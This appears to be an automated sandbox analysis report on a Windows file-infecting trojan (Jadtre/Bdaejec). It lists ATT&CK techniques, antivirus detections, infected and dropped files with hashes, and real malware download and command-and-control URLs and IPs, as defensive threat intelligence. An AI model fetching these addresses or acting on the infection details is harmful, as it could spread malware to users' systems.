              Collection: Archive Collected Data (1); Input Capture (11); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
              Command and Control: Web Service (1); Ingress Tool Transfer (4); Encrypted Channel (11); Non-Application Layer Protocol (4); Application Layer Protocol (15); Multiband Communication; Commonly Used Port; Application Layer Protocol
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
              Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
              Antivirus detection, submitted sample

              Source | Detection | Scanner | Label
              611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | 97% | ReversingLabs | Win32.Virus.Jadtre
              611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | 100% | Avira | W32/Jadtre.B
              611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | 100% | Joe Sandbox ML |

              Antivirus detection, dropped files

              Source | Detection | Scanner | Label
              C:\Users\user\AppData\Local\Temp\vXQpuA.exe | 100% | Avira | TR/Dldr.Small.Z.haljq
              C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Avira | W32/Jadtre.B
              C:\Program Files\7-Zip\Uninstall.exe | 100% | Avira | W32/Jadtre.B
              C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe | 100% | Avira | W32/Jadtre.B
              C:\Users\user\AppData\Local\Temp\vXQpuA.exe | 100% | Joe Sandbox ML |
              C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Joe Sandbox ML |
              C:\Program Files\7-Zip\Uninstall.exe | 100% | Joe Sandbox ML |
              C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe | 100% | Joe Sandbox ML |
              C:\Users\user\AppData\Local\Temp\vXQpuA.exe | 92% | ReversingLabs | Win32.Trojan.Madeba

              No Antivirus matches
              No Antivirus matches
              Antivirus detection, URLs

              Source | Detection | Scanner | Label
              http://upx.sf.net | 0% | URL Reputation | safe
              http://crl.m | 0% | URL Reputation | safe
              http://212.193.30.29/ | 0% | Avira URL Cloud | safe
              https://ipinfo.io/ | 0% | URL Reputation | safe
              http://www.scintilla.org/scite.rng | 0% | Avira URL Cloud | safe
              http://ddos.dnsnb8.net:799/cj//k1.rarx | 100% | Avira URL Cloud | malware
              http://212.193.30.21/Corporation1 | 0% | Avira URL Cloud | safe
              http://212.193.30.21/ | 0% | Avira URL Cloud | safe
              https://pastebin.com:443/raw/A7dSG1te | 0% | Avira URL Cloud | safe
              http://212.193.30.21:80/service/communication.php | 0% | Avira URL Cloud | safe
              http://212.193.30.21/service/communication.phpK | 0% | Avira URL Cloud | safe
              https://twitter.com/telegram | 0% | Avira URL Cloud | safe
              http://www.activestate.comHolger | 0% | Avira URL Cloud | safe
              http://212.193.30.45/proxies.txt | 0% | Avira URL Cloud | safe
              https://softs-portal.com/api/registerUser.phpg | 100% | Avira URL Cloud | malware
              http://ddos.dnsnb8.net:799/cj//k1.rarDownloadManager | 100% | Avira URL Cloud | malware
              https://telegram.org/img/t_logo.png | 0% | Avira URL Cloud | safe
              https://softs-portal.com/api/registerUser.php | 100% | Avira URL Cloud | malware
              https://db-ip.com/ | 0% | Avira URL Cloud | safe
              http://212.193.30.45/ | 0% | Avira URL Cloud | safe
              http://www.microsoft.co | 0% | Avira URL Cloud | safe
              http://www.baanboard.comBrendon | 0% | Avira URL Cloud | safe
              http://wfsdragon.ru/api/setStats.php | 100% | Avira URL Cloud | phishing
              https://ipinfo.io/Content-Type: | 0% | Avira URL Cloud | safe
              http://www.scintilla.org | 0% | Avira URL Cloud | safe
              https://ipgeolocation.io/ | 0% | Avira URL Cloud | safe
              http://wfsdragon.ru/ | 0% | Avira URL Cloud | safe
              https://telegram.org/ | 0% | Avira URL Cloud | safe
              http://212.193.30.45/proxies.txtE | 0% | Avira URL Cloud | safe
              http://wfsdragon.ru:80/api/setStats.php | 100% | Avira URL Cloud | phishing
              http://www.develop.com | 0% | Avira URL Cloud | safe
              https://softs-portal.com/ | 100% | Avira URL Cloud | malware
              http://212.193.30.21/hp | 0% | Avira URL Cloud | safe
              http://ddos.dnsnb8.net:799/cj//k1.rar | 100% | Avira URL Cloud | phishing
              https://db-ip.com/https://ipgeolocation.io/https://www.maxmind.com/en/locate-my-ip-addresstype | 0% | Avira URL Cloud | safe
              http://www.spaceblue.com | 0% | Avira URL Cloud | safe
              http://www.baanboard.com | 0% | Avira URL Cloud | safe
              http://ddos.dnsnb8.net:799/cj//k1.rar0 | 100% | Avira URL Cloud | malware
              http://ddos.dnsnb8.net:799/cj//k1.rar& | 100% | Avira URL Cloud | phishing
              http://www.develop.comDeepak | 0% | Avira URL Cloud | safe
              http://ddos.dnsnb8.net:799/cj//k1.rarras | 100% | Avira URL Cloud | phishing
              https://telegram.org/file/400780400431/1/-u0XrknOtfw.232636/60f98efd626b95d010 | 0% | Avira URL Cloud | safe
              https://core.telegram.org/api | 0% | Avira URL Cloud | safe
              https://pastebin.com/raw/A7dSG1te | 0% | Avira URL Cloud | safe
              http://www.rftp.comJosiah | 0% | Avira URL Cloud | safe
              http://212.193.30.21/service/communication.phpk_ | 0% | Avira URL Cloud | safe
              http://212.193.30.29/server.txt | 0% | Avira URL Cloud | safe
              http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE | 0% | Avira URL Cloud | safe
              http://www.activestate.com | 0% | Avira URL Cloud | safe
              http://212.193.30.21/hp0 | 0% | Avira URL Cloud | safe
              http://www.rftp.com | 0% | Avira URL Cloud | safe
              http://www.spaceblue.comMathias | 0% | Avira URL Cloud | safe
              http://ddos.dnsnb8.net:799/cj//k1.rarI | 100% | Avira URL Cloud | phishing
              https://www.smartsharesystems.com/Morten | 0% | Avira URL Cloud | safe
              http://212.193.30.21/service/communication.php0 | 0% | Avira URL Cloud | safe
              https://pastebin.com/~ | 0% | Avira URL Cloud | safe
              http://www.lua.org | 0% | Avira URL Cloud | safe
              http://ddos.dnsnb8.net:799/cj//k1.rarW | 100% | Avira URL Cloud | phishing
              https://www.maxmind.com/en/locate-my-ip-address | 0% | Avira URL Cloud | safe
              https://telegram.org/J | 0% | Avira URL Cloud | safe
              http://ddos.dnsnb8.net/ | 100% | Avira URL Cloud | phishing
              http://212.193.30.21/service/communication.php | 0% | Avira URL Cloud | safe
              https://telegram.org:443/P7 | 0% | Avira URL Cloud | safe
              http://212.193.30.21/service/communication.php$ | 0% | Avira URL Cloud | safe
              https://telegram.org/file/400780400026/1/xwmW8Qofk5M.263566/16218cb12e7549e76b | 0% | Avira URL Cloud | safe
              http://ddos.dnsnb8.net:799/cj//k1.rare | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
telegram.org | 149.154.167.99 | true | false | | unknown
wfsdragon.ru | 172.67.133.215 | true | false | | unknown
pastebin.com | 104.20.4.235 | true | true | | unknown
ddos.dnsnb8.net | unknown | unknown | true | | unknown
softs-portal.com | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://telegram.org/ | false | Avira URL Cloud: safe | unknown
https://pastebin.com/raw/A7dSG1te | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
212.193.30.21 | unknown | Russian Federation | 57844 | SPD-NETTR | false
104.20.4.235 | pastebin.com | United States | 13335 | CLOUDFLARENETUS | true
212.193.30.45 | unknown | Russian Federation | 57844 | SPD-NETTR | false
172.67.133.215 | wfsdragon.ru | United States | 13335 | CLOUDFLARENETUS | false
212.193.30.29 | unknown | Russian Federation | 57844 | SPD-NETTR | false
149.154.167.99 | telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1480302
Start date and time: 2024-07-24 17:25:59 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 17s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe
Detection: MAL
Classification: mal100.spre.troj.evad.winEXE@4/9@7/6
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 21
• Number of non-executed functions: 89
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 104.208.16.94
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe
Time | Type | Description
11:27:12 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
212.193.30.21 | HogKe2gnNF.exe | malicious | CryptOne, PrivateLoader, SmokeLoader | 212.193.30.21/service/communication.php
212.193.30.21 | bLvAFQEQFB.exe | malicious | CryptOne, SmokeLoader | 212.193.30.21/base/api/getData.php
212.193.30.21 | File.exe | malicious | RedLine | 212.193.30.21/base/api/getData.php
212.193.30.21 | N0kodnmVTc.exe | malicious | PrivateLoader, RedLine | 212.193.30.21/base/api/getData.php
212.193.30.21 | File.exe | malicious | RedLine | 212.193.30.21/base/api/getData.php
212.193.30.21 | 7D9E22E88F7B5ABF22553DFC438D8F40E17C33E8FC9FB.exe | malicious | Unknown | 212.193.30.21/base/api/getData.php
212.193.30.21 | ckc238HATk.exe | malicious | Unknown | 212.193.30.21/base/api/statistics.php
212.193.30.21 | ckc238HATk.exe | malicious | Unknown | 212.193.30.21/base/api/statistics.php
212.193.30.21 | TjDCLiM89x.exe | malicious | RedLine | 212.193.30.21/base/api/getData.php
212.193.30.21 | 7nSmJgc4Js.exe | malicious | Unknown | 212.193.30.21/base/api/getData.php
104.20.4.235 | envifa.vbs | malicious | Remcos | pastebin.com/raw/V9y5Q5vv
104.20.4.235 | New Voicemail Invoice 64746w .js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
104.20.4.235 | Invoice Payment N8977823.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
104.20.4.235 | Pending_Invoice_Bank_Details_XLSX.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
104.20.4.235 | Pending_Invoice_Bank_Details_kofce_.JS.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
104.20.4.235 | Update on Payment.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
212.193.30.45 | 5DCF34F35A1874D190C81C7197785C4F4F9305842918F.exe | malicious | Unknown | 212.193.30.45/proxies.txt
212.193.30.45 | File.exe | malicious | DBatLoader | 212.193.30.45/proxies.txt
212.193.30.45 | windows_update.exe | malicious | DBatLoader | 212.193.30.45/proxies.txt
212.193.30.45 | File.exe | malicious | Unknown | 212.193.30.45/proxies.txt
212.193.30.45 | o1dXxyQmEx.exe | malicious | CryptOne, SmokeLoader | 212.193.30.45/proxies.txt
212.193.30.45 | h9DGdo7AvB.exe | malicious | Unknown | 212.193.30.45/proxies.txt
212.193.30.45 | File.exe | malicious | PrivateLoader | 212.193.30.45/proxies.txt
212.193.30.45 | HogKe2gnNF.exe | malicious | CryptOne, PrivateLoader, SmokeLoader | 212.193.30.45/proxies.txt
212.193.30.45 | bLvAFQEQFB.exe | malicious | CryptOne, SmokeLoader | 212.193.30.45/US/PSD_Cover300us.exe
212.193.30.45 | File.exe | malicious | RedLine | 212.193.30.45/proxies.txt
Match | Associated Sample Name / URL | Detection | Threat Name | Context
pastebin.com | 25C1.exe | malicious | Glupteba, Xmrig | 104.20.3.235
pastebin.com | 88YW43jlqt.exe | malicious | DCRat | 172.67.19.24
pastebin.com | installer.exe | malicious | LummaC, PureLog Stealer, Xmrig, zgRAT | 104.20.3.235
pastebin.com | aabJ5lAG3l.doc | malicious | Unknown | 104.20.3.235
pastebin.com | updater.exe | malicious | Xmrig | 104.20.4.235
pastebin.com | DeqcE30sLb.exe | malicious | DCRat | 172.67.19.24
pastebin.com | Mx0UGSI897.exe | malicious | DCRat | 104.20.3.235
pastebin.com | eE1xnwas4F.exe | malicious | LummaC | 104.20.3.235
pastebin.com | conhost.exe | malicious | Xmrig | 104.20.3.235
pastebin.com | SecuriteInfo.com.Win64.Evo-gen.29709.21053.exe | malicious | Unknown | 104.20.3.235
wfsdragon.ru | Trojan-Spy.Win32.Stealer.aawf-427b5d1b32a8e17.exe | malicious | Backstage Stealer, FFDroider, Glupteba, Metasploit, PrivateLoader, Raccoon Stealer v2, RedLine | 104.21.5.208
wfsdragon.ru | Trojan.Win32.Agentb.krec-5c97c35e6537283493bb.exe | malicious | Fabookie, PrivateLoader, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar | 172.67.133.215
wfsdragon.ru | HEUR-Trojan.Win32.Chapak.gen-774ae4107d461361.exe | malicious | Amadey, Fabookie, Nymaim, PrivateLoader, RedLine, SmokeLoader, Tofsee | 172.67.133.215
wfsdragon.ru | 66BF743BABAD7405D2426B25BF8D1BB493F6D9048B55E.exe | malicious | Raccoon Stealer v2, RedLine, SmokeLoader, Socelars, onlyLogger | 172.67.133.215
wfsdragon.ru | HEUR-Trojan.Win32.Bsymem.gen-493aea7196b43b77.exe | malicious | Amadey, Nymaim, PrivateLoader, RedLine, SmokeLoader | 104.21.5.208
wfsdragon.ru | 273F433BA1CEBFAD830E52490A04CA744351FC4624928.exe | malicious | PrivateLoader, RedLine, Socelars | 172.67.133.215
wfsdragon.ru | HEUR-Trojan.Win32.Chapak.gen-c82a55fdd3caeb95.exe | malicious | Amadey, Fabookie, Nymaim, PrivateLoader, Raccoon Stealer v2, RedLine, SmokeLoader | 172.67.133.215
wfsdragon.ru | 009206D0BB95A4DBEF8A24AD9D75434E0DC86CAABA9F0.exe | malicious | Nymaim, PrivateLoader, RedLine, Vidar, Xmrig, onlyLogger | 104.21.5.208
wfsdragon.ru | DC812FA1AE68DFA017CFDE268E2AE523019308B102BCE.exe | malicious | PrivateLoader, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, zgRAT | 172.67.133.215
wfsdragon.ru | DAD9E695E9F592E48326DD349556F81987C115AD152BF.exe | malicious | Fabookie, PrivateLoader, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, zgRAT | 104.21.5.208
telegram.org | rPO0977-6745.exe | malicious | Snake Keylogger | 149.154.167.220
telegram.org | z23RevisedInvoice.exe | malicious | DarkCloud, PureLog Stealer | 149.154.167.220
telegram.org | Updated PI.exe | malicious | AgentTesla, RedLine | 149.154.167.220
telegram.org | rcrypt.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
telegram.org | 231210-06-AgentTesla-9da180.exe | malicious | AgentTesla | 149.154.167.220
telegram.org | SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
telegram.org | Purchase Order POT-247110.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
telegram.org | Purchase Order.exe | malicious | DarkTortilla, Snake Keylogger | 149.154.167.220
telegram.org | List & Sample_Doc3.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
telegram.org | Confirmation transfer Copy AGS # 24-00379.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          SPD-NETTRwO2hW34tnC.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                          • 45.158.226.175
                          pVwXSHLriO.elfGet hashmaliciousMirai, MoobotBrowse
                          • 45.67.86.157
                          na.elfGet hashmaliciousMiraiBrowse
                          • 185.118.141.106
                          nigga.shGet hashmaliciousMiraiBrowse
                          • 45.12.96.123
                          rc2G4fAIY4.elfGet hashmaliciousGafgyt, MiraiBrowse
                          • 45.81.142.31
                          QzNtWxCnZh.elfGet hashmaliciousGafgyt, MiraiBrowse
                          • 45.81.142.31
                          dqVusfiLPV.elfGet hashmaliciousGafgyt, MiraiBrowse
                          • 45.81.142.31
                          SecuriteInfo.com.Linux.Siggen.9999.6736.22177.elfGet hashmaliciousGafgyt, MiraiBrowse
                          • 45.81.142.31
                          SecuriteInfo.com.Trojan.GenericKD.65594079.25944.10510.exeGet hashmaliciousAgentTesla, RHADAMANTHYSBrowse
                          • 212.193.30.32
                          tyG9Ou5NOn.exeGet hashmaliciousUnknownBrowse
                          • 185.72.8.185
                          CLOUDFLARENETUShttps://forms.office.com/r/MbTXnrrxDYGet hashmaliciousHTMLPhisherBrowse
                          • 104.17.24.14
                          5A1FB27924AB99541F08D3A46321B88FA4CE52A2346EBD92DC8DA423C907CDE3.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                          • 188.114.96.3
                          http://pub-18c0b230f8f2453bbc80499dbfd675b4.r2.devGet hashmaliciousUnknownBrowse
                          • 104.17.247.203
                          Millich Law.pdfGet hashmaliciousHTMLPhisherBrowse
                          • 104.18.95.41
                          https://mfgvendor.feeco.com:8081/Get hashmaliciousUnknownBrowse
                          • 104.17.25.14
                          https://mfgvendor.feeco.com:8081/Get hashmaliciousUnknownBrowse
                          • 104.17.25.14
                          https://rb.gy/ExNW8QGet hashmaliciousUnknownBrowse
                          • 188.114.96.3
                          securedoc_20240724T165428.htmlGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                          • 104.17.25.14
                          http://redapplelaw.redappledigitalsolutions.com/auth/registerGet hashmaliciousUnknownBrowse
                          • 104.26.1.216
                          http://link.mail.beehiiv.com/ss/c/u001.6C5fb2jgNhK_7sih4vM3VdXQvrvE9q5c82BetVgY4Tn_3vzvYophOo2JT7xoV-WSpIvcZOkxKRXavgDLqT8WDs81Kxwhn4ndaTj0SIW8pbE34PI3c8z85y8KF4b-3ctNBArb85FAtL-FvZ40umZH9aQETjMP7rTEiG1euALUwnOXxEOVey2ATbLesbQR6xxXmVQHnmd4pAMEpmvli0DXS3xWhmye0azQAc3gRlzrGWVUMzqfQog2yJQHz6Mdmf6a4nCgejh2JKgdwU-dC7d7RpcWEcgULfqQmicxg_xKRYc1aJrR3j1E3jT9fZxZO7WhDsQCbeMl8Mpj69s5RbxkO_huRS08Z3pfl78-scr41jA/47y/YxEtkvUcQDyArHo9NWTE1A/h6/h001.EMfOFVR5jhkE5RSbP1E9Z3FDv6QlJukJxLDJqd6igsM#DB87@OFSOPTICS.COMGet hashmaliciousHTMLPhisherBrowse
                          • 104.18.69.40
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
a0e9f5d64349fb13191bc781f81f42e1 | qGJBgGtR7e.exe | Get hash | malicious | Gh0stCringe, GhostRat, Mimikatz, RunningRAT | Browse
• 149.154.167.99
• 104.20.4.235
VaajyQsbTV.exe | Get hash | malicious | GhostRat, Nitol | Browse
• 149.154.167.99
• 104.20.4.235
PXTCFXKM.exe | Get hash | malicious | LummaC | Browse
• 149.154.167.99
• 104.20.4.235
RQTMGXIK.msi | Get hash | malicious | LummaC | Browse
• 149.154.167.99
• 104.20.4.235
szw3yovpYg.exe | Get hash | malicious | Unknown | Browse
• 149.154.167.99
• 104.20.4.235
Snort_2_9_20_Installer.x64.exe | Get hash | malicious | LummaC | Browse
• 149.154.167.99
• 104.20.4.235
BXMWTJmc5L.exe | Get hash | malicious | Unknown | Browse
• 149.154.167.99
• 104.20.4.235
Gw47LwivS6.exe | Get hash | malicious | Unknown | Browse
• 149.154.167.99
• 104.20.4.235
M7RrbN4DTk.exe | Get hash | malicious | Remcos, DBatLoader | Browse
• 149.154.167.99
• 104.20.4.235
1a14cfb6dc3766a34333fa7bbc8b1e912302ce0e550809266dd3f763fb719ed6.exe | Get hash | malicious | Bdaejec | Browse
• 149.154.167.99
• 104.20.4.235
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\AppData\Local\Temp\vXQpuA.exe | 5A1FB27924AB99541F08D3A46321B88FA4CE52A2346EBD92DC8DA423C907CDE3.exe | Get hash | malicious | Babuk, Bdaejec, Djvu | Browse
5AECB2A5BC5447DC736C29882193FEF4F2B007299A1817C664E1BA6A028363CF.exe | Get hash | malicious | Bdaejec, SmokeLoader | Browse
58BB54DE7A3ED504F85202B0CD55AC2DA9FC821B5695AA854703F885CD80B044.exe | Get hash | malicious | Bdaejec, SmokeLoader | Browse
5673773206126F12F4692E91C084B927357D9CF5FA3D5C312D89C9942B5C90FE.exe | Get hash | malicious | Bdaejec, RedLine | Browse
56586BDA88E32BE6A2AE5BA59A06127DC382CA0D5619DFDFE0DD0353EE4877AB.exe | Get hash | malicious | Bdaejec, RedLine | Browse
54E3EE54FAC434E25C03DED56A4680F1EA40A245D657440AC9C51BE7F27EF656.exe | Get hash | malicious | Bdaejec, SmokeLoader | Browse
55282E8B63997F62AF3DD4B9D40CACB30A72D8DB1597D3F53057839CF7335750.exe | Get hash | malicious | Bdaejec, RedLine | Browse
550F.exe | Get hash | malicious | Bdaejec | Browse
4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exe | Get hash | malicious | Babadeda, Bdaejec | Browse
537C7A26CE5E39643B98D9C078A14D5E955F0FCCF49073D05B1F8E3294636B41.exe | Get hash | malicious | Bdaejec | Browse
                                              Process:C:\Users\user\AppData\Local\Temp\vXQpuA.exe
                                              File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):19456
                                              Entropy (8bit):6.5907204196107125
                                              Encrypted:false
                                              SSDEEP:384:1FSSpXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:znQGPL4vzZq2o9W7GsxBbPr
                                              MD5:572AA6C32C5BFD19EB6D8E31FBEB4061
                                              SHA1:61805C83DB4EF745674A4822B8EE4D8FBA445595
                                              SHA-256:E8E371987EE3C41D86716DE7768DBA5849E8D25C3A1E04F9F25D1C8E964A4F78
                                              SHA-512:A672D36A1D6432DE8D1F4092A2751D64C4C19EEA0787E2FA526E43375930C6EC1B9AE8D748F1A86F8EA742A21114FE65C7756B4BACDF2DF82FD7BC74EADA5168
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................
                                              Process:C:\Users\user\AppData\Local\Temp\vXQpuA.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:modified
                                              Size (bytes):2389504
                                              Entropy (8bit):6.731351098671059
                                              Encrypted:false
                                              SSDEEP:49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
                                              MD5:B93A7469EAF49752A9909402F9211F1C
                                              SHA1:D91FB0E3E3A0C856BF57824D28478CB3797C34A5
                                              SHA-256:A7F82F88671D992F6C8BE764D1C3301A9C274036E76FD84FC712B833E6CAE7C7
                                              SHA-512:422B9FE42EB307C67C72D2048CE4CED1DD129C92FFAD563B24EF521E2D1DA7F0D802708D814DB9A1110578C4860C341EE34DC2D6714EB79C5B5463D1237281A3
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\AppData\Local\Temp\vXQpuA.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):31744
                                              Entropy (8bit):6.36671338686422
                                              Encrypted:false
                                              SSDEEP:768:uWQ3655Kv1X/qY1MSdrGQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdrdGCq2iW7z
                                              MD5:F48416BDA08FFA6824D4D021BE48D604
                                              SHA1:1F0E2EAF0EDC1E4293F51E8DD741CDB56A395906
                                              SHA-256:0996CBFD765BC4F3AB17A90591A437551BC96678CB28E59548A4E8355D9D0C82
                                              SHA-512:E3996263F01432BC29717C53D313F988A2196D0D8BA59AC1287AA1DDD56CCC0A66314E430A505971B3F2A5D7CE9A7B4650F19709CB900484010D3AEF79EE0845
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):0.9103403648235437
                                              Encrypted:false
                                              SSDEEP:96:jpF6Rzbr9sOhn07afzQXIDcQpc6dcE3cw3iW+HbHg/5ksS/YyNlIcIPkShH+DOyI:VA1br9C0nZ9mHjE/nzuiFVZ24IO8Je
                                              MD5:3255A232802366A7D926720164A16B3E
                                              SHA1:F05E75718F89565342600467BEC2235CF12B7A90
                                              SHA-256:9201179333DE6F9414D1C2A93A3F4AE204FBF7028B79D3A99A349E7F9B56669B
                                              SHA-512:4F0573B65D034E5C41AA783F7A6669762FA01A1A853B3AA4268D4B3CD4B4EFE436C58B8AF610A5AB1EA1972D015C638E2D96A7CEDC9BC4FFC777ACF6EE308AF5
                                              Malicious:false
                                              Reputation:low
                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.0.8.4.1.5.1.4.8.3.1.6.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.0.8.4.1.5.6.0.1.4.3.0.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.5.1.f.4.8.0.b.-.5.5.a.e.-.4.0.e.3.-.9.0.0.a.-.f.c.3.3.1.8.9.7.1.4.4.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.0.f.9.4.3.f.2.-.a.3.f.6.-.4.c.3.f.-.b.a.9.c.-.6.6.f.3.d.a.1.4.9.c.0.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.v.X.Q.p.u.A...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.c.8.-.0.0.0.1.-.0.0.1.4.-.5.c.d.e.-.5.8.e.7.d.d.d.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.f.6.f.d.3.d.f.1.6.f.b.5.1.5.f.6.d.5.6.4.5.1.c.3.1.1.9.2.6.2.5.0.0.0.0.f.f.f.f.!.0.0.0.0.d.4.e.9.e.f.1.0.d.7.6.8.5.d.4.9.1.5.8.3.c.6.f.a.9.3.a.e.5.d.9.1.0.5.d.8.1.5.b.d.!.v.X.Q.p.u.A...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Mini DuMP crash report, 14 streams, Wed Jul 24 15:26:55 2024, 0x1205a4 type
